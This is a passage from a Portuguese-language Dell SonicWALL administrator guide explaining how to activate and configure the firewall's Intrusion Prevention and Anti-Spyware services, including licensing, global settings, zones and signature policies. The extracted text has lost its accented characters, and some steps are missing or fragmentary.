mysonicwall.com, a pgina Sistema > Licenas ser exibida.
Etapa 3 Clique em Ativar ou Renovar na coluna Gerenciar Servio da tabela Gerenciar servios on-
line.

Etapa 4 Insira a Chave de Ativao no campo Nova chave de licena e clique em Enviar. Intrusion
Prevention Service da SonicWALL A pgina Sistema > Licenas exibida com os links do
Antispyware e Gateway Antivirus mostrados na parte inferior da tabela Gerenciar servios
on-line com as Chaves de Ativao filhas.
Etapa 5 Clique no link do Gateway Antivirus. A Chave de Ativao filha inserida automaticamente no
campo Nova chave de licena. A Chave de Ativao filha uma chave diferente da chave pai
para o SonicWALL Gateway Antivirus, Antispyware e Intrusion Prevention Service.
Etapa 7 Clique no link do SonicWALL Gateway Antivirus. A Chave de ativao filho inserida
automaticamente no campo Nova chave de licena. A Chave de Ativao filha uma chave
diferente da chave pai para o SonicWALL Gateway Antivirus, Antispyware e Intrusion
Prevention Service.
Parabns! Voc ativou o Servio de Gateway Anti-Virus, Anti-spyware e de preveno contra
intruso do SonicWALL.

Configurando o Servio de preveno contra invases
O Servio de preveno contra invases (IPS) configurado na pgina Servios de
segurana > Preveno contra invases, que dividida em trs painis:
Status do IPS
Configuraes globais do IPS
Polticas de IPS

Status do IPS na pgina 1238
Configuraes globais do IPS na pgina 1239
Configurando a Proteo do IPS nas zonas na pgina 1242
Polticas do IPS na pgina 1242

Status do IPS
O painel Status do IPS exibe informaes sobre o status do banco de dados de assinatura e
sobre sua
licena do Dell SonicWALL IPS.
O painel Status do IPS exibe as seguintes informaes:

Banco de dados de assinatura indica se o banco de dados de assinatura est sendo
baixado, j foi baixado ou precisa ser baixado. O banco de dados de assinatura
automaticamente atualizado a aproximadamente cada hora. possvel atualizar
manualmente seu banco de dados do IPS a qualquer momento clicando no boto Atualizar
localizado na seo Status do IPS.
Carimbo de data/hora de banco de dados de assinatura exibe a ltima atualizao do
banco de dados de assinatura do IPS, e no a ltima atualizao do seu dispositivo de
segurana SonicWALL.
ltima verificao indica a ltima vez que o dispositivo de segurana SonicWALL
verificou o banco de dados de assinatura por atualizaes. O dispositivo de segurana
SonicWALL automaticamente tenta sincronizar com o banco de dados na inicializao e
uma vez a cada hora.
Data de expirao do Servio do IPS indica a data de expirao do servio do IPS. Se a
sua assinatura do IPS expirar, a inspeo do SonicWALL IPS interrompida e as
definies de configurao do IPS so removidas do dispositivo de segurana SonicWALL.
Depois de renovar sua licena do IPS, essas configuraes so automaticamente
restauradas para o estado previamente configurado.
Nota: Habilite o Servio de Preveno contra Invases na pgina Rede > Zonas.
Se clicar em Rede > Zonas nesta nota, esta opo exibir a pgina Rede > Zonas na qual
possvel configurar o IPS em zonas. Consulte Configurando a Proteo do IPS nas
zonas na pgina 1242.

Configuraes globais do IPS
O painel Configuraes globais do IPS fornece as principais configuraes para habilitar o
Dell SonicWALL IPS
em seu firewall.
O Dell SonicWALL IPS ativado por meio da habilitao global do IPS em seu firewall e da
seleo da classe de ataques. Como alternativa, tambm possvel configurar uma Habilitar
lista de excluso do IPS.
Habilitando o IPS na pgina 1239
Configurando uma Lista de excluso do IPS na pgina 1240
Redefinindo as Configuraes e Polticas do IPS na pgina 1241
Nota Para obter instrues completas sobre como configurar o SonicWALL Intrusion Prevention
Service, consulte o Manual do Administrador do SonicWALL Intrusion Prevention Service,
disponvel no website da documentao da SonicWALL em http://www.sonicwall.com/us/
Support.html.
Habilitando o IPS
Para habilitar o IPS em seu firewall:
Etapa 1 Acesse a pgina Servios de segurana > Preveno contra invases.

Etapa 2 Acesse o painel Configuraes globais do IPS.
Etapa 3 Selecione Habilitar o IPS.

Etapa 4 Selecione a ao desejada (Prevenir todos, Detectar todos ou ambos) para cada um dos
Grupos de assinaturas:
Ataques de alta prioridade
Ataques de prioridade mdia
Ataques de prioridade baixa

Nota Para habilitar a preveno contra invases no firewall, especifique uma ao Prevenir
todos para pelo menos um dos Grupos de assinaturas. Se nenhuma ao Prevenir todos
for marcada, nenhuma preveno contra invases ocorrer no firewall.
Nota Selecionar Prevenir todos e Detectar todos para todos os Grupos de assinaturas
proteger sua rede contra a maioria dos ataques perigosos e perturbadores.
Configurando uma Lista de excluso do IPS
(Opcional) Para configurar uma Lista de excluso do IPS:

Etapa 2 Acesse o painel Configuraes globais do IPS.
Etapa 3 Selecione Habilitar o IPS.

Etapa 4 Clique no boto Definir Configuraes do IPS.
A caixa de dilogo Lista de excluso do IPS exibida.
Etapa 5 Selecione Habilitar Lista de excluso do IPS.

Etapa 6 Selecione a opoUsar Objeto de endereo ou Usar Intervalo de endereo.
Etapa 7 Se tiver selecionado a opo Usar Objeto de endereo, selecione o objeto de endereo que
deseja excluir do menu.

Etapa 8 Se tiver selecionado a opo Usar Intervalo de endereo, clique no boto Adicionar.
A caixa de dilogo Adicionar Entrada do intervalo do IPS exibida.
Etapa 9 Insira o intervalo de endereos IP que sero excludos nas caixas Endereo IP de e Endereo
IP at.
Redefinindo as Configuraes e Polticas do IPS
Para redefinir as Configuraes e Polticas do IPS:

Etapa 2 No painel Configuraes globais do IPS, clique no boto Redefinir Configuraes e
Polticas do IPS.
A seguinte mensagem exibida.

A seguinte mensagem exibida na parte inferior da tela:
Status: A configurao foi atualizada.

Configurando a Proteo do IPS nas zonas
possvel aplicar o SonicWALL IPS s zonas na pgina Rede > Zonas para impor o
SonicWALL IPS no s entre cada zona de rede e a WAN, mas tambm entre zonas internas.
Por exemplo, habilitar o SonicWALL IPS na zona da LAN impe o SonicWALL IPS a todo o
trfego de entrada e sada da LAN.
Na seo Status do IPS da pgina Servios de Segurana > Intrusion Prevention Service,
clique no link Rede > Zonas para acessar a pgina Rede > Zonas. possvel aplicar o
SonicWALL IPS a uma zona listada na pgina Rede > Zonas.
Para habilitar o SonicWALL em uma zona, siga estas etapas:
Etapa 1 V at Rede > Zonas ou na seo Status do IPS, na pgina Servios de Segurana >
Preveno contra invases, clique no link Rede > Zonas. A pgina Rede > Zonas ser
exibida.
Etapa 2 Na coluna Configurar da tabela Configuraes de zona, clique no cone Editar para a
zona que voc deseja aplicar o SonicWALL IPS. A janela Editar zona exibida.
Etapa 3 Clique na caixa de seleo Habilitar IPS. exibida uma marca de seleo. Para desativar o
SonicWALL IPS, desmarque a caixa.
Tambm possvel habilitar a proteo do SonicWALL IPS para as novas zonas criadas na
pgina Rede > Zonas. Ao clicar no boto Adicionar exibida a janela Adicionar zona, que
inclui as mesmas configuraes que a janela Editar zona.
Polticas do IPS
O painel Polticas do IPS permite a exibio das assinaturas do SonicWALL IPS e a
configurao do tratamento de assinaturas por grupos de categorias ou por assinatura. As
categorias so assinaturas agrupadas com base no tipo de ataque.
possvel exibir as assinaturas das seguintes maneiras:

Exibio e configurao das definies de categoria na pgina 1243
Exibio e configurao das definies de assinatura na pgina 1244
Exibindo e configurando assinaturas para categorias especficas na pgina 1245
Menu Prioridade na pgina 1245
Pesquisar ID de assinatura na pgina 1245

Exibio e configurao das definies de categoria
Na linha Exibir estilo, o menu Categoria permite que voc escolha as categorias ou
assinaturas que deseja exibir na coluna Categoria. possvel escolher Todas as categorias,
Todas as assinaturas ou uma categoria individual, como ACTIVEX ou DNS. Se voc escolher
uma categoria individual, as assinaturas dessa categoria sero exibidas.
A coluna Categoria permite classificar as categorias e assinaturas em ordem crescente ou
decrescente clicando na seta para cima ou para baixo ao lado do cabealho da coluna.
Para exibir ou alterar as definies de categoria do IPS de uma categoria especfica:
Etapa 1 Selecione Todas as categorias no menu Categoria.

Etapa 2 Clique no cone Editar na coluna Configurar da categoria.
A caixa de dilogo Editar Categoria do IPS exibida.
Etapa 3 Nos menus Preveno e Deteco, selecione Usar Configurao global, Habilitar ou
Desabilitar. Se voc selecionar Usar Configurao global, os valores configurados na seo
Configuraes globais do IPS sero usados, mas possvel substituir as Configuraes
globais do IPS, selecionando Habilitar ou Desabilitar nesses menus.
Etapa 4 Nos menus restantes, selecione os valores desejados.
Etapa 5 Para a opo Filtro de redundncia de log (segundos), se desejar usar os valores
configurados na seo Configuraes globais do IPS, selecione Usar Configuraes
globais.

Exibio e configurao das definies de assinatura
Para exibir ou alterar as definies de assinatura do IPS de uma assinatura especfica:
Etapa 1 Selecione Todas as assinaturas no menu Categoria.

Etapa 2 Clique no cone Editar na coluna Configurar da assinatura.
A caixa de dilogo Editar Assinatura do IPS exibida.
As primeiras cinco caixas so esmaecidas e contm dados no configurveis p ara essa

assinatura.
Etapa 3 Nos menus Preveno e Deteco, selecione Habilitar ou Desabilitar. A opo Usar
Configurao da categoria desabilitada.
configurados na seo Configuraes globais do IPS, selecione Usar Configuraes da
categoria.

Exibindo e configurando assinaturas para categorias especficas
Para exibir e configurar assinaturas para categorias especficas:
Etapa 1 Selecione uma das seguintes categorias no menu Categoria:

As assinaturas dessa categoria so exibidas.
Etapa 2 Clique no cone Editar na coluna Configurar da assinatura.
assinatura.
categoria.
Menu Prioridade
O menu Prioridade permite especificar a prioridade das assinaturas que voc deseja exibir.
Para especificar a prioridade das assinaturas que voc deseja exibir:
Selecione uma das seguintes prioridades no menu Prioridade:
Tudo
Elevado
Mdia
Baixa
Pesquisar ID de assinatura
possvel usar a caixa Pesquisar ID de assinatura para exibir ou alterar as configuraes de

assinatura do IPS para uma assinatura especfica.
Para exibir ou alterar as definies de assinatura do IPS de uma assinatura especfica:
Etapa 1 Digite o ID da assinatura na caixa Pesquisar ID de assinatura.
Etapa 2 Clique no cone Pesquisar ao lado da caixa.


assinatura.
categoria.

Captulo 68
Ativando o servio anti-spyware
Servios de segurana > Anti-spyware

Viso geral do anti-Spyware na pgina 1247
Ativao do SonicWALL Gateway Antivirus, Antispyware e IPS na pgina 1248
Criando uma conta no mysonicwall.com na pgina 1249
Registro de seu dispositivo de segurana de rede Dell SonicWALL na pgina 1250
Ativao de AVALIAES GRATUITAS na pgina 1251
Ativao da licena do Gateway Anti-Virus, Anti-Spyware e IPS na pgina 1251
Ativao da proteo do servio anti-spyware na pgina 1253
Viso geral do anti-Spyware

O Dell SonicWALL Anti-Spyware parte da soluo Dell SonicWALL Gateway Anti-Virus, Anti-
Spyware e Intrusion Prevention Service que fornece proteo em tempo real e abrangente
contra vrus, worms, cavalos de Troia e vulnerabilidades de software.
O servio Dell SonicWALL Anti-Spyware protege redes contra spyware intrusivo, excluindo
instalaes e fornecimento de spyware no gateway e negando que o spyware instalado
comunique informaes de sada recolhidas. O Dell SonicWALL Anti-Spyware funciona com
outros programas anti-spyware, como aplicativos que removem aplicativos de spyware
existentes de hosts. Voc est convidado a usar ou instalar o software anti-spyware baseado
em host como uma medida adicional de proteo contra spyware.
O Dell SonicWALL Anti-Spyware analisa as conexes de entrada para os mtodos mais
comuns de fornecimento de spyware e instalaes de componentes baseados no ActiveX. Isso
examina tambm os executveis de instalao de entrada e arquivos de gabinete que cruzam
o gateway e redefine as conexes que enviam os arquivos de instalao de spyware na LAN.
Esses pacotes de arquivo podem ser freeware no pacote de adware, keyloggers ou outros tipos
de spyware.
Se um spyware tiver sido instalado em uma estao de trabalho LAN antes da instalao do
servio Anti-Spyware, o servio examinar o trfego de sada para fluxos originados em
clientes infectados e reiniciar essas conexes. Por exemplo, quando o spyware vem
perfilando os hbitos de navegao do usurio e tenta enviar as informaes de perfil
domsticas, o firewall identifica o trfego e redefine a conexo.
Ativando o servio anti-spyware | 1247

O servio SonicWALL Anti-Spyware oferece a seguinte proteo:
Bloqueia spywares enviados por meio de componentes ActiveX instalados
automaticamente, o veculo mais comum para distribuio de programas de spyware mal-
intencionados.
Verifica e registra as ameaas de spyware que so transmitidas pela rede e alertas os
administradores de que um novo spyware for detectado e/ou bloqueado.
Interrompe a comunicao de programas de spyware existentes em segundo plano com
hackers e servidores na Internet, impedindo a transferncia de informaes confidenciais.
Oferece controle granular sobre aplicativos em rede, possibilitando que os administradores
permitam ou recusem seletivamente a instalao de programas de spyware.
Impede ameaas de spyware enviadas por e-mail verificando e bloqueando os e-mails
infectados transmitidos por SMTP, IMAP ou e-mail baseado na Web.
Nota Consulte o Guia do Administrador do SonicWALL Anti-Spyware no site do SonicWALL:

http://www.SonicWALL.com/us/support.HTML para a documentao completa do produto.
Ativao do SonicWALL Gateway Antivirus, Antispyware e IPS

Se voc no tem o Gateway Anti-Virus, Anti-Spyware e Preveno contra Intruso SonicWALL
instalados em seu firewall, a pgina Segurana Servios > Anti-spyware indica que uma
atualizao necessria e inclui um link para ativ-lo na sua interface de gerenciamento do
firewall.
Por o SonicWALL Intrusion Prevention Service ser parte do SonicWALL Gateway Anti-Virus,
Anti-Spyware e Intrusion Prevention Service, voc ter uma nica Chave de Licena para
ativar todos os trs servios no firewall.
Voc deve ativar a licena do SonicWALL Gateway Anti-Virus, Anti-Spyware e Intrusion
Prevention Service da pgina Servios de segurana > Preveno contra Intruso primeiro.
Aps ativar o Intrusion Prevention Service, voc pote ativar o SonicWALL Gateway Anti-Virus
e o SonicWALL Anti-Spyware.
Para ativar o SonicWALL Gateway Anti-Virus, Anti-Spyware e Intrusion Prevention Service no
seu firewall, voc precisa do seguinte:
Licena do SonicWALL Gateway Anti-Virus, Anti-Spyware e Intrusion Prevention
Service Voc precisa adquirir uma licena de Servio de Gateway Anti-Virus, Anti-spyware
e de preveno contra intruso SonicWALL de um revendedor SonicWALL ou na sua conta
mysonicwall.com (limitado a clientes dos EUA e Canad).
Conta mysonicwall.com. Criar uma conta no mysonicwall.com rpido, fcil e GRTIS.
Simplesmente preencha um formulrio de registro on-line na interface de gerenciamento
do firewall. Tambm possvel acessar a sua conta mysonicwall.com em
https://www.mysonicwall.com de qualquer conexo com a Internet com um navegador da Web.
Dispositivo de segurana de rede Dell SonicWALL registrado com conexo de
Internet ativa Registrar seu firewall um procedimento simples feito diretamente na
interface de gerenciamento.
SonicOS 6.0 ou mais recente. O seu firewall deve estar executando o SonicOS 6.0 ou
mais recente para o SonicWALL Gateway Anti-Virus, Anti-Spyware e Intrusion Prevention
Service.

Dica Se o seu firewall est conectado Internet e registrado em mysonicwall.com, voc pode
ativar uma VERSO DE AVALIAO GRATUITA de 30 dias do SonicWALL Gateway Anti-
Virus e do SonicWALL Intrusion Prevention Service separadamente nas pginas Servios
de segurana>Gateway Anti-Virus, Servio de segurana > Anti-Spyware e Servios
de segurana > Preveno de intruso na interface de gerenciamento.
Nota Os Guias de Administrador para SonicWALL Gateway Anti-Virus, SonicWALL Anti-Spyware

e SonicWALL Intrusion Prevention Service esto disponveis no site de documentao do
SonicWALL: http://www.sonicwall.com/us/Support.html

formulrio de registro on-line na interface de gerenciamento do firewall.
Nota Se voc j possui uma conta mysonicwall.com, v em Registro de seu dispositivo de

Etapa 1 Efetue login na interface de gerenciamento de dispositivo de segurana de rede Dell

SonicWALL
Etapa 2 Se a pgina Sistema > Status no exibida na interface de gerenciamento, clique em
Etapa 3 Na pgina Sistema > Status, na seo Servios de segurana, clique no link Registrar em
O SonicWALL no est registrado. Clique aqui para registrar seu SonicWALL.
Etapa 5 Na pgina Conta mysonicwall, insira suas informaes nos campos Informaes de conta,
obrigatrios.


informando que sua conta foi criada. Clique em Continuar.
Parabns. Sua conta mysonicwall.com est ativada.
Agora, voc precisa fazer logon em mysonicwall.com para registrar seu dispositivo de
segurana de rede SonicWALL.

Registro de seu dispositivo de segurana de rede Dell SonicWALL

rede.
de spyware no gateway, interrompendo o funcionamento deles.

segurana SonicWALL.
Etapa 6 Na parte superior da pgina Pesquisa do produto, insira um Nome amigvel" para seu
dispositivo de segurana de contedo SonicWALL no campo Nome amigvel. O nome
amigvel permite que voc identifique facilmente seu dispositivo de segurana de contedo
SonicWALL em sua conta mysonicwall.com.
mais os servios de acordo com suas necessidades.
Ativao de AVALIAES GRATUITAS

cada servio separadamente no painel Gerenciar servios online na pgina Sistema >
Licenas ou clicando no link AVALIAO GRATUITA na respectiva pgina de Servios de
etapas:
Virus
Etapa 3 Clique em Experimentar na coluna AVALIAO GRATUITA do painel Gerenciar servios
on-line. O servio est habilitado em seu dispositivo de segurana.
Ativao da licena do Gateway Anti-Virus, Anti-Spyware e IPS

O SonicWALL Intrusion Prevention Service parte do SonicWALL Gateway Anti-Virus, Anti-
Spyware e Intrusion Prevention Service. A Chave de ativao que voc receber para todos
os trs servios no seu firewall.
Se voc no tiver uma licena do SonicWALL Gateway Anti-Virus, Anti-Spyware, and Intrusion
Prevention Service ativada no seu firewall, dever adquirir com um revendedor SonicWALL ou
na sua conta mysonicwall.com (limitado a clientes dos EUA e Canad).

Se voc possuir uma Chave de ativao do Servio de Gateway Anti-Virus, Anti-spyware e de
preveno contra intruso do SonicWALL, efetue as seguintes etapas para ativar os servios
combinados:
Etapa 1 Na pgina Servios de segurana > Preveno contra Intruso, clique no link Assinatura
do Intrusion Prevention Service. A pgina Login no mysonicwall.com ser exibida.
Senha e clique em Enviar. Se o seu firewall j estiver registrado sua conta mysonicwall.com,
a pgina Sistema > Licenas exibida.
Etapa 3 Clique em Ativar ou Renovar na coluna Gerenciar servio no painel Gerenciar servios on-
line.
Etapa 4 Digite a Chave de ativao no campo Nova chave de licena e clique em Enviar. O
SonicWALL Intrusion Prevention Service ativado. A pgina Sistema > Licenas exibida
com os links do Anti-Spyware e Gateway Anti-Virus mostrados na parte inferior do painel
Gerenciar servios on-line com as Chaves de Ativao filhas.
Etapa 5 Clique no link do Gateway Anti-Virus. A Chave de ativao filho inserida automaticamente no
campo Nova chave de licena. A Chave de Ativao filha uma chave diferente da chave pai
para o SonicWALL Gateway Antivirus, Anti-Spyware e Intrusion Prevention Service.
Parabns! Voc ativou o SonicWALL Gateway Anti-Virus, Anti-Spyware, and Intrusion
Prevention Service.

Ativao da proteo do servio anti-spyware
A pgina Servio de segurana > Anti-Spyware exibe as definies de configurao para
gerenciar o servio no dispositivo de segurana Dell SonicWALL.
A pgina Servio de segurana > Anti-Spyware dividida em trs sees:

Status do anti-spyware exibe informaes de status sobre o estado do banco de dados
da assinatura, sua licena do Dell SonicWALL Anti-Spyware e outras informaes.
Configuraes globais do anti-spyware fornece as principais configuraes para
ativar o SonicWALL Anti-Spyware em seu dispositivo de segurana Dell SonicWALL,
especificando a proteo geral do SonicWALL Anti-Spyware com base em trs classes de
spyware e outras opes de configurao.
Polticas do Anti-Spyware permite a exibio das assinaturas do Dell SonicWALL Anti-
Spyware e a configurao do tratamento de assinaturas por grupos de categorias ou por
assinatura. As categorias so assinaturas agrupadas com base no produto ou fabricante.
Nota Depois de ativar a licena do Dell SonicWALL Anti-Spyware, necessrio habilitar e

configurar o Anti-Spyware na interface de gerenciamento da SonicWALL para que as
polticas anti-spyware sejam aplicadas ao trfego da rede.
Nota Para obter informaes adicionais sobre a proteo anti-spyware, consulte o Guia do
Administrador do Dell SonicWALL Anti-Spyware no site da Dell SonicWALL:

Status do anti-spyware
A seo Status do anti-spyware mostra o estado do banco de dados de assinatura, incluindo
o carimbo de data e hora do banco de dados e o horrio que os servidores de assinatura
SonicWALL foram verificados pela ltima vez quanto a assinaturas mais atuais. O dispositivo
de segurana SonicWALL automaticamente tenta sincronizar com o banco de dados na
inicializao e uma vez a cada hora.
Banco de dados da assinatura indica que o banco de dados de assinatura foi baixado
no dispositivo de segurana SonicWALL.
Carimbo de data e hora do banco de dados de assinatura exibe a data e a hora que
o banco de dados de assinatura foi atualizado pela ltima vez. O Carimbo de data e hora
do banco de dados de assinatura um carimbo de data e hora de atualizaes do banco
de dados de assinatura do SonicWALL Anti-Spyware, e no a ltima atualizao do seu
dispositivo de segurana SonicWALL.
ltima verificao - exibe a ltima vez que o dispositivo de segurana SonicWALL
verificou se h atualizaes de assinatura.
Data de expirao do Anti-Spyware exibe a data de expirao da licena do
SonicWALL Anti-Spyware. Se a sua assinatura do SonicWALL Anti-Spyware expirar, a
inspeo do SonicWALL Anti-Spyware ser interrompida e as definies de configurao
do SonicWALL Anti-Spyware sero removidas do dispositivo de segurana SonicWALL.
Essas configuraes so restauradas automaticamente aps a renovao da licena do
SonicWALL Anti-Spyware para o estado configurado anteriormente.
A seguinte nota contm um link para a pgina Rede > Zonas onde voc pode configurar o
Anti-Spyware em zonas individuais:
Nota: Habilite o Anti-Spyware por zona na pgina Rede > Zonas.
Configuraes globais do Anti-Spyware

O painel Configuraes globais do Anti-Spyware permite que voc impea e/ou detecte
globalmente ataques com base nos seguintes nveis de ataque:
Spyware de alto nvel de perigo esses aplicativos de spyware so os mais perigosos
para sua rede, como keyloggers ou porn dialers, ou podem conter vulnerabilidades de
segurana. A remoo pode ser extremamente difcil ou impossvel.
Spyware de nvel mdio de perigo esses aplicativos de spyware podem causar
interrupes em sua rede, como o aumento do trfego de rede que diminui o desempenho.
A remoo pode ser extremamente difcil.
Spyware de baixo nvel de perigo esses aplicativos de spyware so caracterizados por
atividade menos intrusiva e no so uma ameaa imediata. Eles podem ser usurios de
perfil e, geralmente, so simples de remover.
Dica A Dell SonicWALL recomenda habilitar Impedir tudo para Spyware de alto nvel de perigo
e Spyware de nvel mdio de perigo para fornecer proteo de rede contra o spyware
mais perigoso.
A proteo do Anti-Spyware fornece dois mtodos para gerenciar ameaas de spyware

globais: deteco (Detectar tudo) e preveno (Impedir tudo). Voc deve especificar uma
ao Impedir tudo no painel Grupos de assinatura para que o anti-spyware ocorra em um
nvel global no dispositivo de segurana SonicWALL.

Quando Impedir tudo est habilitado para um grupo de assinaturas no painel Grupos de
assinaturas, o dispositivo de segurana SonicWALL automaticamente desconecta e redefine
a conexo para impedir que o trfego chegue ao seu destino.
Quando Detectar tudo est habilitado para um grupo de assinatura no painel Grupos de
assinaturas, o dispositivo de segurana SonicWALL registra e alerta todo o trfego que
corresponde a qualquer assinatura no grupo, mas no toma nenhuma medida contra o trfego.
A conexo prossegue at seu destino pretendido. Voc exibe o log do SonicWALL na pgina
Log > Exibir, bem como configura como os alertas so tratados pelo dispositivo de segurana
SonicWALL na pgina Log > Automao.
Cuidado Tenha cuidado ao selecionar apenas Detectar tudo. Selecionar apenas Detectar tudo
registra e envia alertas sobre o trfego que corresponde a qualquer assinatura no grupo,
mas no toma nenhuma medida contra o trfego. O trfego prossegue at seu destino
pretendido.
Quando Detectar tudo e Impedir tudo esto habilitados para um grupo de assinaturas no
painel Grupos de assinaturas, o SonicOS registra e envia alertas sobre o trfego que
corresponde a qualquer assinatura no grupo, e automaticamente desconecta e redefine a
conexo para impedir que o trfego chegue ao destino.
Habilitar inspeo da comunicao de spyware de sada

A opo Habilitar inspeo da comunicao de spyware de sada est disponvel para
verificar o trfego de sada para comunicao do spyware.

Aplicao da proteo do Anti-Spyware em zonas
Se seu firewall estiver executando o SonicOS, voc poder aplicar o Dell SonicWALL Anti-
Spyware a zonas na pgina Rede > Zonas para impor o Anti-Spyware no apenas entre cada
zona de rede e a rede remota (WAN), mas tambm entre zonas internas. Por exemplo, habilitar
o Anti-Spyware na zona da LAN impe um Anti-Spyware em todo o trfego LAN de entrada e
sada.
Na seo Status do anti-spyware da pgina Servios de segurana > Servio anti-
spyware, clique no link Rede > Zonas para acessar a pgina Rede > Zonas. Voc aplica o
Anti-Spyware a uma das zonas listadas na pgina Rede > Zonas.
Para habilitar o Anti-Spyware em uma zona:
Etapa 1 Na interface de gerenciamento do firewall, selecione Rede > Zonas. (Ou, na seo Status do
Anti-Spyware, na pgina Servios de segurana > Intrusion Prevention, clique no link
Rede > Zonas.) A pgina Rede > Zonas exibida.
Etapa 2 Na coluna Configurar do painel Configuraes de zona, clique no cone de edio para
a zona que deseja aplicar o SonicWALL Anti-Spyware. A janela Editar zona exibida.
Etapa 3 Clique na caixa de seleo Habilitar o anti-spyware. Uma marcao aparece. Para desativar
o SonicWALL Anti-Spyware, desmarque a caixa.
Voc tambm habilitar a proteo SonicWALL Anti-Spyware para novas zonas que voc criar
na pgina Rede > Zonas. Clicar no boto Adicionar exibe a janela Adicionar zona, que inclui
as mesmas configuraes que a janela Editar zona.
Polticas do Anti-Spyware
A seo Polticas do Anti-Spyware permite que voc visualize e gerencie como o SonicWALL
Anti-Spyware trata as assinaturas por grupos de categorias ou por assinatura. Categorias so
assinaturas agrupadas por produto ou fabricante, e so listadas no menu Estilo de
visualizao.

As entradas listadas no painel Polticas do Anti-Spyware so do banco de dados de
assinatura do Dell SonicWALL Anti-Spyware baixado em seu firewall. Categorias e assinaturas
so atualizadas dinamicamente pelo Servio Anti-Spyware. Categorias e assinaturas mudam
dinamicamente ao longo do tempo em resposta s novas ameaas.
Voc pode exibir as assinaturas em uma variedade de modos de exibio usando o menu
Estilo de visualizao. Esse menu permite que voc especifique as categorias ou assinaturas
para exibir no painel Polticas do Anti-Spyware. Voc pode selecionar Todas as assinaturas,
ou pode selecionar a primeira letra ou nmero no nome do spyware.
Selecionar Todas as assinaturas no menu exibe todas as assinaturas por categoria. O painel
Polticas do Anti-Spyware exibe todas as categorias e suas assinaturas. Os cabealhos da
categoria dividem as entradas de assinatura. Esses cabealhos exibem Global nas colunas
Impedir e Detectar, indicando as configuraes globais que voc definiu na seo
Configuraes globais do Anti-Spyware.
Painel Polticas do Anti-Spyware
O painel Polticas do Anti-Spyware exibe as seguintes informaes sobre cada entrada de

assinatura:
Produto - exibe o nome ou fabricante do spyware.
Nome - exibe o nome do spyware como um link. Clicar no link do nome exibe as
informaes do SonicAlert sobre o spyware.
ID - o nmero da ID do banco de dados do SonicWALL da assinatura.
Impedir - uma marca de verificao nesta coluna indica que a preveno est habilitada.
Uma marca de verificao verde aparece na coluna Detectar quando voc faz uma
alterao nas configuraes de preveno global ou de categoria.
Detectar - uma marca de verificao nesta coluna indica que a deteco est habilitada.
Uma marca de verificao verde aparece na coluna Detectar quando voc faz uma
alterao nas configuraes de deteco global ou de categoria.
Nvel de perigo - define a assinatura do ataque como Baixo, Mdio ou Alto, conforme
definido para o painel Grupos de assinaturas.
Comentrios - exibe uma breve descrio da poltica.
Configurar - clicar no cone de edio na coluna Configurar do cabealho da categoria
exibe a janela Editar categoria do Anti-Spyware. Clicar no cone de edio na coluna
Configurar de uma assinatura individual exibe a janela Editar assinatura do Anti-
Spyware. Essas janelas permitem que voc defina uma ao diferente nas configuraes
globais para a categoria ou assinatura especfica.
Exibio de informaes do spyware
No painel Polticas do Anti-Spyware, clicar no link do nome do spyware na coluna Nome,

exibe uma pgina SonicALERT que fornece informaes detalhadas sobre o spyware.

Navegao no painel de polticas do Anti-Spyware
O campo Itens exibe o nmero do painel da primeira categoria ou assinatura. Se voc estiver
exibindo a primeira pgina de um painel, a entrada poder ser Itens 1 a 50 (de 58). Voc pode
inserir um nmero no campo Itens para ir diretamente at uma entrada especfica ou usar os
botes de navegao para navegar no painel.
As assinaturas do SonicWALL Anti-Spyware so exibidas em 50 por pgina no painel Polticas

do Anti-Spyware.
Nota Voc pode alterar o padro, 50 entradas por painel, na pgina Sistema > Administrao,
na seo Configuraes de gerenciamento da Web.
Pesquisa no banco de dados de assinaturas
Voc pode pesquisar o banco de dados de assinatura inserindo uma cadeia de caracteres de
pesquisa no campo Pesquisar assinaturas que contm cadeia de caracteres e, em
seguida, clicando no cone.
Classificao de entradas de categoria ou assinatura
Clicar nos cabealhos do painel Polticas do Anti-Spyware (Nome, ID, Impedir, Detectar ou
Nvel de perigo) classifica as entradas do painel de acordo com o cabealho. Uma seta para
cima com o nome de cabealho de coluna indica que as entradas so classificadas em ordem
decrescente. Uma seta para baixo com o nome de cabealho de coluna indica que as entradas
so classificadas em ordem crescente.
Configurao das polticas de categoria

Voc pode optar por substituir as configuraes globais de preveno e deteco de acordo
com a categoria. As configuraes globais Impedir tudo e Detectar tudo, que incluem
Spyware de alto nvel de perigo, Spyware de nvel mdio de perigo e Spyware de baixo
nvel de perigo, so definidas na seo Configuraes globais do Anti-Spyware. As
categorias podem incluir qualquer combinao de nveis de perigo, conforme definido no painel
Grupos de assinaturas.
As categorias de assinatura disponveis so listadas no menu Estilo de visualizao na seo
Polticas do Anti-Spyware. Configurar os comportamentos de preveno e deteco de
acordo com a categoria afeta todas as assinaturas na categoria, independentemente das
configuraes globais de prioridade do ataque (Baixa, Mdia ou Alta)
Substituio das configuraes globais de preveno e deteco por categoria no SonicOS Standard
1. Selecione Todas as categorias ou uma categoria individual no menu Categoria.
2. Se voc selecionar Todas as categorias, clique no cone de edio na coluna

Configurar da categoria que deseja alterar. A janela Editar categoria do Anti-Spyware
exibida.

3. Se voc selecionar uma categoria individual, clique no cone de edio direita do
menu Categoria. A janela Editar categoria do Anti-Spyware exibida.
4. Se voc deseja alterar a configurao global para Preveno, selecione Habilitar ou
Desabilitar no menu Preveno.
5. Se voc deseja alterar a configurao global para Deteco, selecione Habilitar ou
Desabilitar no menu Deteco.
6. Se voc deseja alterar as configuraes globais para deteco e preveno, selecione
Habilitar ou Desabilitar no menu Deteco e Preveno.
7. Se voc quiser alterar a configurao Filtro de redundncia de log na configurao global
padro, desmarque a caixa Usar configuraes de categoria para Filtro de
redundncia de log (segundos) e insira um valor de tempo em segundos.
8. Clique em OK para salvar as alteraes.
Dica Se voc selecionar Todas as assinaturas no menu Categoria, todas as categorias e suas
assinaturas sero exibidas no painel Polticas do Anti-Spyware, permitindo que voc
configure a categoria e as assinaturas dentro da categoria.
Se voc substituir qualquer configurao global de uma categoria, uma marca de verificao
verde aparecer nas colunas Impedir e/ou Detectar do painel Polticas do Anti-Spyware.
Substituio das configuraes globais de preveno e deteco por categoria no SonicOS Enhanced
1. Selecione Todas as categorias ou uma categoria individual no menu Categoria.

2. Se voc selecionar Todas as categorias, clique no cone de edio da coluna Configurar
para a categoria que deseja alterar. A janela Editar categoria do Anti-Spyware exibida.
3. Se voc selecionar uma categoria individual, clique no cone de edio direita do menu
Categoria. A janela Editar categoria do Anti-Spyware exibida.
4. Se voc deseja alterar a configurao global para Preveno, selecione Habilitar ou
5. Se voc deseja alterar a configurao global para Deteco, selecione Habilitar ou
